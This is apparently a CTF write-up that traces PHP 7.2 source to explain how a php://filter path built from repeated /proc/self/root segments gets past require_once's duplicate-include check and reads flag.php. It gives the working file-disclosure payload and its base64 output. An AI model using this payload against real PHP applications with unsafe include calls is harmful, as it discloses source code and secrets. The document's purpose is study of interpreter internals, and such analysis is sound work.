Analyzing PHP Source Code: Bypassing the Restriction of require_once
Introduction
As we know, in PHP, require_once checks whether a file has already been included before including it again. Can we bypass this mechanism? Is there a way to read files without writing a webshell?
1
2
3
4
5
6
7
8
|
<?php
error_reporting(E_ALL);
require_once('flag.php');
highlight_file(__FILE__);
if(isset($_GET['content'])) {
$content = $_GET['content'];
require_once($content);
} // The code for this problem is from WMCTF2020 make php great again 2.0, the intended solution is to bypass `require_once`
|
PHP’s file inclusion mechanism adds already included files and their true paths to a hash table. Once a file has been included, it cannot be included again using require_once.
Today, let’s discuss how we can imagine bypassing this hash table so that PHP thinks the file name we pass is not in the hash table, but still able to locate and read its contents.
Here’s a little piece of knowledge: /proc/self points to the current process’s /proc/pid/, and /proc/self/root/ is a symbolic link pointing to /. With this in mind, we can bypass the mechanism using the pseudo-protocol and multiple levels of symbolic links. The payload is as follows:
1
2
3
|
php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
// Result: PD9waHAKCiRmbGFnPSJ0ZXN0e30iOwo=
|
Next, we will analyze the bypassing mechanism by looking at the source code of PHP 7.2.23. It is recommended to use Clion for debugging in Linux. As for how to set up a debugging environment, you can search for it yourself and refer to other articles.
Analysis
Organizing Thoughts
So why is this possible? Since it’s about file inclusion, let’s start by examining the function zend_include_or_eval() in zend_execute.c. There’s a bunch of switch cases here:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
|
case ZEND_REQUIRE_ONCE: {
zend_file_handle file_handle;
zend_string *resolved_path;
resolved_path = zend_resolve_path(Z_STRVAL_P(inc_filename), (int)Z_STRLEN_P(inc_filename));
// Resolve the real path of the file and access the file using the real path
// If it doesn't exist, leave it for now and copy it as is, and later access it using the pseudo-protocol with zend_stream_open
// If the given file name starts with scheme://, php_resolve_path() only parses the path when wrapper == &php_plain_files_wrapper; otherwise, it returns NULL
// Obviously, we give a php:// pseudo-protocol, so zend_resolve_path fails and returns NULL, and then goes to the else block.
if (resolved_path) {
// Bypassed
if (zend_hash_exists(&EG(included_files), resolved_path)) {
// Match the corresponding file path in the hash table
goto already_compiled;
}
} else {
// Now just copy, keep it as it is.
...
resolved_path = zend_string_copy(Z_STR_P(inc_filename));
}
}
// Start file inclusion using pseudo protocol, the path resolution result will be written to file_handle.opened_path
if (SUCCESS == zend_stream_open(ZSTR_VAL(resolved_path), &file_handle)) {
// Resolution result: /proc/24273/root/proc/self/root/var/www/html/flag.php
if (!file_handle.opened_path) {
// This will not be executed
file_handle.opened_path = zend_string_copy(resolved_path);
}
if (zend_hash_add_empty_element(&EG(included_files), file_handle.opened_path)) {
zend_op_array *op_array = zend_compile_file(&file_handle, (type==ZEND_INCLUDE_ONCE?ZEND_INCLUDE:ZEND_REQUIRE));
zend_destroy_file_handle(&file_handle);
zend_string_release(resolved_path);
if (Z_TYPE(tmp_inc_filename) != IS_UNDEF) {
zend_string_release(Z_STR(tmp_inc_filename));
}
return op_array;
} else {
zend_file_handle_dtor(&file_handle);
already_compiled:
new_op_array = ZEND_FAKE_OP_ARRAY;
}
} else {
if (type == ZEND_INCLUDE_ONCE) {
zend_message_dispatcher(ZMSG_FAILED_INCLUDE_FOPEN, Z_STRVAL_P(inc_filename));
} else {
zend_message_dispatcher(ZMSG_FAILED_REQUIRE_FOPEN, Z_STRVAL_P(inc_filename));
}
}
zend_string_release(resolved_path);
}
break;
|
How does PHP determine if a file has been included before? Of course, it looks it up in a hash table.
Before looking it up in the hash table, the file name needs to be cleaned up (e.g. /flag.php/../flag.php will still resolve to /flag.php, PHP is not stupid), and then it can be put into the hash table for matching.
According to the given code, the include order should be index.php -> flag.php -> $content, so we used a pseudo protocol to bypass it first. However, if the length of /proc/self/root is shortened, the resolved opened_path will become /var/www/html/flag.php. Why is that? We can trace the code and find where opened_path is modified when require_once($content) calls zend_stream_open().
On the Right Track
Following the code, we found that in php_stream_open_for_zend_ex, the pointer &handle->opened_path is passed as the third parameter to _php_stream_open_wrapper_ex(), and then returned.
We can use Clion’s “Evaluate Expression” feature to see the address of &handle->opened_path, which is 0x7ffd908b3580. We need to find where it is modified and where the modified value is generated. First, we found that it is written in line 1026 of plain_wrapper.c: _php_stream_fopen():
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
|
/*
At this point, `_php_stream_open_wrapper_ex` is executed here:
if (wrapper) {
if (!wrapper->wops->stream_opener) {
php_stream_wrapper_log_error(wrapper, options ^ REPORT_ERRORS,
"wrapper does not support stream open");
} else {
----> stream = wrapper->wops->stream_opener(wrapper,
path_to_open, mode, options ^ REPORT_ERRORS,
opened_path, context STREAMS_REL_CC);
}
*/
#ifdef PHP_WIN32
fd = php_win32_ioutil_open(realpath, open_flags, 0666);
#else
fd = open(realpath, open_flags, 0666);
#endif
if (fd != -1) {
if (options & STREAM_OPEN_FOR_INCLUDE) {
ret = php_stream_fopen_from_fd_int_rel(fd, mode, persistent_id);
} else {
ret = php_stream_fopen_from_fd_rel(fd, mode, persistent_id);
}
if (ret) {
if (opened_path) {
// Write realpath to opened_path
*opened_path = zend_string_init(realpath, strlen(realpath), 0);
}
if (persistent_id) {
efree(persistent_id);
}
|
Now that you know where the code is written, you can find out how it is done by using the functionality of a calculation expression to obtain the address: 0x7ffebc13cd50.
In the same function, if you go back a little, you will notice this. It is expand_filepath that modifies realpath, which is the desired /proc/24273/root/proc/self/root/var/www/html/flag.php:
1
2
3
4
5
6
7
8
9
|
if (options & STREAM_ASSUME_REALPATH) {
// Treat the incoming filename as the real path directly, but it is not executed here
strlcpy(realpath, filename, sizeof(realpath));
} else {
if (expand_filepath(filename, realpath) == NULL) {
// Expand the filename to find the real path
return NULL;
}
}
|
If you follow it, you will find that it is in virtual_file_ex, where tsrm_realpath_r is called to obtain the resolution result resolved_path, and after some processing, the result is passed back through state:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
add_slash = (use_realpath != CWD_REALPATH) && path_length > 0 && IS_SLASH(resolved_path[path_length-1]);
t = CWDG(realpath_cache_ttl) ? 0 : -1;
path_length = tsrm_realpath_r(resolved_path, start, path_length, &ll, &t, use_realpath, 0, NULL);
// The path resolution result actually comes from tsrm_realpath_r, passed through resolved_path
// The value is '/proc/24273/root/proc/self/root/var/www/html/flag.php'
// Then after the following processing, it turns out that nothing has been done
...
if (verify_path) {
...
} else {
state->cwd_length = path_length;
tmp = erealloc(state->cwd, state->cwd_length+1);
state->cwd = (char *) tmp;
// The result is written to state->cwd here, and this result is returned through state.
memcpy(state->cwd, resolved_path, state->cwd_length+1);
ret = 0;
}
/* Stacktrace
virtual_file_ex zend_virtual_cwd.c:1385
expand_filepath_with_mode fopen_wrappers.c:816
expand_filepath_ex fopen_wrappers.c:754
expand_filepath fopen_wrappers.c:746
_php_stream_fopen plain_wrapper.c:991
*/
|
Then, write at expand_filepath_with_mode:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
if (virtual_file_ex(&new_state, filepath, NULL, realpath_mode)) {
// Don't forget the previous virtual_file_ex, the result is in new_state->cwd
efree(new_state.cwd);
return NULL;
}
if (real_path) {
copy_len = new_state.cwd_length > MAXPATHLEN - 1 ? MAXPATHLEN - 1 : new_state.cwd_length;
memcpy(real_path, new_state.cwd, copy_len);
// Here, it is written in here. If you don't believe it, check if the address of real_path is 0x7ffebc13cd50.
real_path[copy_len] = '\0';
} else {
real_path = estrndup(new_state.cwd, new_state.cwd_length);
}
|
Path Resolution
Verified where it came from and where it should go. Now let’s see how it jumps out.
tsrm_realpath_r is used to resolve the real path. This pile of code for parsing strings is a headache, and it also recursively calls itself.
What does this function do? It matches from back to front, handles special cases such as . .. //, and adjusts the total length of the path. For example, when encountering /var/www/.., remove www/.. and leave /var, and then perform the following operations. Finally, pass the path to tsrm_realpath_r for recursive call.
So let it recursively call first. Recurse to the last layer to be returned, and see the parameters that the function accepts at each layer of recursion.
In simple terms, the recursion mechanism is from back to front, /var/www/html/1.php -> /var/www/html -> /var/www.
This is what the stack looks like, and it seems that everything is different from that line 1173. Why? Let’s track again, and take note of which recursion it is. Set breakpoints at the first line of tsrm_realpath_r, and start counting how many recursions there are. Look at what is different in this call. The easiest way is to press F9 (continue executing the program) as many times as recursions. For convenience, let’s call the call from line 1137 the nth recursion, abbreviated as (n):
1
2
3
4
5
6
7
8
9
10
|
tsrm_realpath_r zend_virtual_cwd.c:756 (n+4) return 1
tsrm_realpath_r zend_virtual_cwd.c:1124 (n+3) return 1
tsrm_realpath_r zend_virtual_cwd.c:1164 (n+2) return 5
tsrm_realpath_r zend_virtual_cwd.c:1164 (n+1)
tsrm_realpath_r zend_virtual_cwd.c:1137 (n)
tsrm_realpath_r zend_virtual_cwd.c:1164 (n-1)
tsrm_realpath_r zend_virtual_cwd.c:1164
...
tsrm_realpath_r zend_virtual_cwd.c:1164 (1)
tsrm_realpath_r zend_virtual_cwd.c:1164
|
Except the irrelevant parts of ZEND_WIN32, in fact, we can find that every time the recursion processes the special cases of . .. //, the previous chain of (0)...(n-1) and the return value of php_sys_lstat(path, &st) are all -1, but when it reaches (n), we can see that php_sys_lstat(path, &st) is 0.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
|
static int tsrm_realpath_r(char *path, int start, int len, int *ll, time_t *t, int use_realpath, int is_dir, int *link_is_dir) /* {{{ */
{
int i, j, save;
int directory = 0;
#ifdef ZEND_WIN32
...
#else
zend_stat_t st;
#endif
realpath_cache_bucket *bucket;
char *tmp;
ALLOCA_FLAG(use_heap)
while (1) {
if (len <= start) {
if (link_is_dir) {
*link_is_dir = 1;
}
return start;
}
i = len;
while (i > start && !IS_SLASH(path[i-1])) {
i--;
}
/* Special case for . .. // */
if (i == len ||
(i == len - 1 && path[i] == '.')) {
/* remove double slashes and '.' */
...
} else if (i == len - 2 && path[i] == '.' && path[i+1] == '.') {
/* remove '..' and previous directory */
...
}
path[len] = 0;
save = (use_realpath != CWD_EXPAND);
if (start && save && CWDG(realpath_cache_size_limit)) {
/* cache lookup for absolute path */
...
}
#ifdef ZEND_WIN32
...
#else
// The save value from (0)...(n-1) is 1 here
if (save && php_sys_lstat(path, &st) < 0) {
// (0)...(n-1) can enter here because php_sys_lstat(path, &st)=-1, while (n) and later cannot!
if (use_realpath == CWD_REALPATH) {
/* file not found */
return -1;
}
/* continue resolution anyway but don't save result in the cache */
// The save value for (0)...(n-1) is 0
save = 0;
}
tmp = do_alloca(len+1, use_heap);
// Copy path to tmp
memcpy(tmp, path, len+1);
// Since the save value for (n) is 1, continue to determine if it is a symbolic link or not
// st.st_mode is the file's type and permission, S_ISLNK returns whether it is a symbolic link
if (save && S_ISLNK(st.st_mode)) {
// The path before the call is: "."
// php_sys_readlink is used to read the real location pointed by a symbolic link and write it to the path variable, where j is the length.
if (++(*ll) > LINK_MAX || (j = php_sys_readlink(tmp, path, MAXPATHLEN)) < 0) {
/* too many links or broken symlinks */
free_alloca(tmp, use_heap);
return -1;
}
path[j] = 0;
// Add \0 at the end to complete the read, at this point path is the pid of the process
if (IS_ABSOLUTE_PATH(path, j)) {
//
j = tsrm_realpath_r(path, 1, j, ll, t, use_realpath, is_dir, &directory);
if (j < 0) {
free_alloca(tmp, use_heap);
return -1;
}
j = tsrm_realpath_r(path, 1, j, ll, t, use_realpath, is_dir, &directory);
if (j < 0) {
free_alloca(tmp, use_heap);
return -1;
}
} else {
if (i + j >= MAXPATHLEN-1) {
free_alloca(tmp, use_heap);
return -1; /* buffer overflow */
}
memmove(path+i, path, j+1);
memcpy(path, tmp, i-1);
path[i-1] = DEFAULT_SLASH;
j = if
}
if (i - 1 <= start) {
j = start;
} else {
/* some leading directories may be unaccessible */
j = tsrm_realpath_r(path, start, i-1, ll, t, save ? CWD_FILEPATH : use_realpath, 1, NULL); //line 1164, the call of (1)...(n).
if (j > start) {
path[j++] = DEFAULT_SLASH;
}
}
if (j < 0 || j + len - i >= MAXPATHLEN-1) {
free_alloca(tmp, use_heap);
return -1;
}
memcpy(path+j, tmp+i, len-i+1);
j += (len-i);
}
if (save && start && CWDG(realpath_cache_size_limit)) {
/* save absolute path in the cache */
realpath_cache_add(tmp, len, path, j, directory, *t);
}
free_alloca(tmp, use_heap);
return j;
}
}
|
Symbolic Links
Let’s think about what our payload is. Creating a loop of symbolic links? What is php_sys_lstat()?
php_sys_lstat() is actually the Linux function lstat(), which is used to retrieve information about a file. It returns 0 on success and -1 on failure, setting errno in the process. Because we have too many symbolic links, errno will always be ELOOP. The number of symbolic links is actually determined by SYMLOOP_MAX, which is a runtime value and cannot be smaller than _POSIX_SYMLOOP_MAX.
After calling php_sys_lstat(), we can use perror() to verify if errno is ELOOP.
Referring to the documentation of sysconf, we tried to calculate sysconf(_SC_SYMLOOP_MAX) and sysconf(_POSIX_SYMLOOP_MAX) using Clion’s expression evaluation feature, but failed. Surprisingly, SYMLOOP_MAX is -1. So we need to find another way to get its value. The simplest way is to manually experiment and find out the value through brute force.
1
2
3
4
|
import os
os.system("echo 233> l00")
for i in range(0,99):
os.system("ln -s l%02d l%02d"%(i,i+1))
|
Then execute ls -al and find that the symbolic link l42 is invalid. The last valid symbolic link is l41, meaning it should be 41->40, 40->39 ..., 01->00. So there are a total of 41 valid symbolic links, making SYMLOOP_MAX equal to 40, which is the number of symbolic links pointing to symbolic links.
Therefore, concatenating a long list of /proc/self/root from back to front and recursively calling tsrm_real_path_r until php_sys_lstat returns 0 will lead to success.
The path contents when successful are as follows: /proc/self is a symbolic link pointing to the current process pid, and root under self is also a symbolic link. So, if we count, there are also 41, which is just right.
1
2
3
|
>>> a = "/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self"
>>> print(a.count("self")+a.count("root"))
41
|
Let’s verify: using Clion’s expression evaluation feature, we can see:
1
2
|
lstat("/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self") # returns 0.
lstat("/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root") # returns -1
|
Recursive Analysis
Since php_sys_lstat() is 1, what does it do in (n)?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
// The result of the previous debugging is that (n) and subsequent saves are 1.
// "/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self" is actually "/proc/self", which is a symbolic link and represents the process's pid. S_ISLNK is used to determine if it is a symbolic link.
if (save && S_ISLNK(st.st_mode)) {
// Before the function call, the path is:
// php_sys_readlink reads the real location pointed to by the symbolic link and writes it to the path variable. j is the length.
if (++(*ll) > LINK_MAX || (j = php_sys_readlink(tmp, path, MAXPATHLEN)) < 0) {
/* too many links or broken symlinks */
free_alloca(tmp, use_heap);
return -1;
}
path[j] = 0;
// Append a '\0' at the end to complete the read operation. The current path is the process's pid and path="24273".
if (IS_ABSOLUTE_PATH(path, j)) {
// Obviously, "24273" is not an absolute path, so let's see the else branch.
j = tsrm_realpath_r(path, 1, j, ll, t, use_realpath, is_dir, &directory);
if (j < 0) {
free_alloca(tmp, use_heap);
return -1;
}
} else {
if (i + j >= MAXPATHLEN-1) {
free_alloca(tmp, use_heap);
return -1; /* buffer overflow */
}
// Start constructing the path, first move path[0...j] backward to path[i].
// j+1 is the number of elements, from index 0 to index j is a total of j+1 elements.
memmove(path+i, path, j+1);
// Copy tmp[0...i-1] back to path[0...i-2].
// i-1 is the number of elements, from index 0 to index i-2 is a total of i-1 elements.
memcpy(path, tmp, i-1);
path[i-1] = DEFAULT_SLASH;
// Add a / to the path. At this point, the path becomes "/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/24273"
j = tsrm_realpath_r(path, start, i + j, ll, t, use_realpath, is_dir, &directory);
// Perform a recursive call (n+1) times
if (j < 0) {
free_alloca(tmp, use_heap);
return -1;
}
}
if (link_is_dir) {
*link_is_dir = directory;
}
}
|
When it reaches (n+1) iterations, at this point, path is no longer a symbolic link, so enter the else section:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
} else {
if (save) {
directory = S_ISDIR(st.st_mode);
// If `link_is_dir` is passed in, assign the pointer to `directory`
if (link_is_dir) {
*link_is_dir = directory;
}
if (is_dir && !directory) {
/* not a directory */
free_alloca(tmp, use_heap);
return -1;
}
}
if (i - 1 <= start) {
j = start;
} else {
/* some leading directories may be unaccessible */
// Line 1164, entered here again, save=1, perform another recursive call (n+2), passing its own use_realpath parameter.
// `path` remains unchanged, same as (n), but the passed-in `link_is_dir` becomes NULL
j = tsrm_realpath_r(path, start, i-1, ll, t, save ? CWD_FILEPATH : use_realpath, 1, NULL);
// Got j=1
if (j > start) {
path[j++] = DEFAULT_SLASH;
}
}
#ifdef ZEND_WIN32
...
#else
if (j < 0 || j + len - i >= MAXPATHLEN-1) {
free_alloca(tmp, use_heap);
return -1;
}
// Copy tmp[i...len-i] to path[1...1+len-i]
// That is, copy the last few characters of tmp to the beginning of path
memcpy(path+j, tmp+i, len-i+1);
j += (len-i);
// Recalculate the total length and return it, the new path is "/proc", j=5.
}
|
(n+2) is the same as (n+1), and it also performs the next recursive call at line 1164, passing the following parameters to (n+3):
1
|
/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc
|
Recursive call to tsrm_realpath_r()
On line (n+4), after the processing in tsrm_realpath_r, the last /proc in the path is removed. At this point, what remains is /proc/self.../root, which is a symbolic link.
As usual, since it is a symbolic link and save is 1, the php_sys_readlink function is called to read the symbolic link. What is the result of the read? It is /.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
if (++(*ll) > LINK_MAX || (j = php_sys_readlink(tmp, path, MAXPATHLEN)) < 0) {
/* too many links or broken symlinks */
free_alloca(tmp, use_heap);
return -1;
}
path[j] = 0;
// path = "/", j = 1
if (IS_ABSOLUTE_PATH(path, j)) {
// When it enters here is_dir =1 , directory=0, go to (n+4), this is the last time
// tsrm_realpath_r("/", 1, 1, ll, t, 1, 1, &directory) with return value j=1
j = tsrm_realpath_r(path, 1, j, ll, t, use_realpath, is_dir, &directory);
if (j < 0) {
free_alloca(tmp, use_heap);
return -1;
}
} else {
...
}
if (link_is_dir) {
*link_is_dir = directory;
}
|
Recursive call returns
Then, in the while (1) before (n+4), since len <= start, it returns early. The return value is start=1:
1
2
3
4
5
6
7
8
|
while (1) {
//len=1, start=1
if (len <= start) {
if (link_is_dir) {
*link_is_dir = 1;
}
return start;
}
|
Returning back from (n+3), the return value to (n+2) is also 1, but when (n+2) returns to (n+1), it does something else:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
|
} else {
if (save) {
...
}
if (i - 1 <= start) {
j = start;
} else {
/* some leading directories may be unaccessible */
j = tsrm_realpath_r(path, start, i-1, ll, t, save ? CWD_FILEPATH : use_realpath, 1, NULL);
// j = 1, start = 1
if (j > start) {
path[j++] = DEFAULT_SLASH;
}
}
if (j < 0 || j + len - i >= MAXPATHLEN-1) {
free_alloca(tmp, use_heap);
return -1;
}
// Previously obtained j = 1, copy tmp[1...len-i] to path[1...1+len-i]
// len is the total length of the original string passed in, i and len are determined before the special processing of '.. . //'
// For example, if path is '/var/www/html/', the i here is above the / after html
/*
761 i = len;".
762 while (i > start && !IS_SLASH(path[i-1])) {
763 i--;
764 }
*/
memcpy(path+j, tmp+i, len-i+1);
j += (len-i);
// Recalculate the total length, return it, the new path is "/proc/", j=5, return to (n+1).
}
(n+1) returns to (n):
```c++
if () {}
} else {
if (save) {
...
}
if (i - 1 <= start) {
j = start;
} else {
/* some leading directories may be unaccessible */
j = tsrm_realpath_r(path, start, i-1, ll, t, save ? CWD_FILEPATH : use_realpath, 1, NULL);
// path="/proc", j=5, start=1
if (j > start) {
path[j++] = DEFAULT_SLASH;
// Append a '/', j+=1, now j=6
}
}
if (j < 0 || j + len - i >= MAXPATHLEN-1) {
free_alloca(tmp, use_heap);
return -1;
}
// Get j=6 above, copy tmp[i...len-i] to path[6...6+len-i]
/*
tmp="/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/74079"
*/
memcpy(path+j, tmp+i, len-i+1);
j += (len-i);
// Recalculate the total length, return it, the new path is "/proc/24273", j=11, return to (n).
}
|
Finally, returning from (n) to (0) is a process of copying and concatenating paths one by one, and the final result is /proc/24273/root/proc/self/root/var/www/html/flag.php.
Summary
When debugging source code, it’s best to use a top-down approach.
To find out where a value comes from and where it goes, if it is passed by pointer, you can get its address and observe the address values of the arguments in the function call stack.
When debugging, make good use of the IDE’s expression evaluation feature, you can also use the conditional breakpoint feature to assist debugging, and even directly output information to the console.
If you encounter a recursively called function, first analyze what this function does, find out its boundary conditions, and observe the parameter passing and data changes at each recursion according to the stack in the last recursion.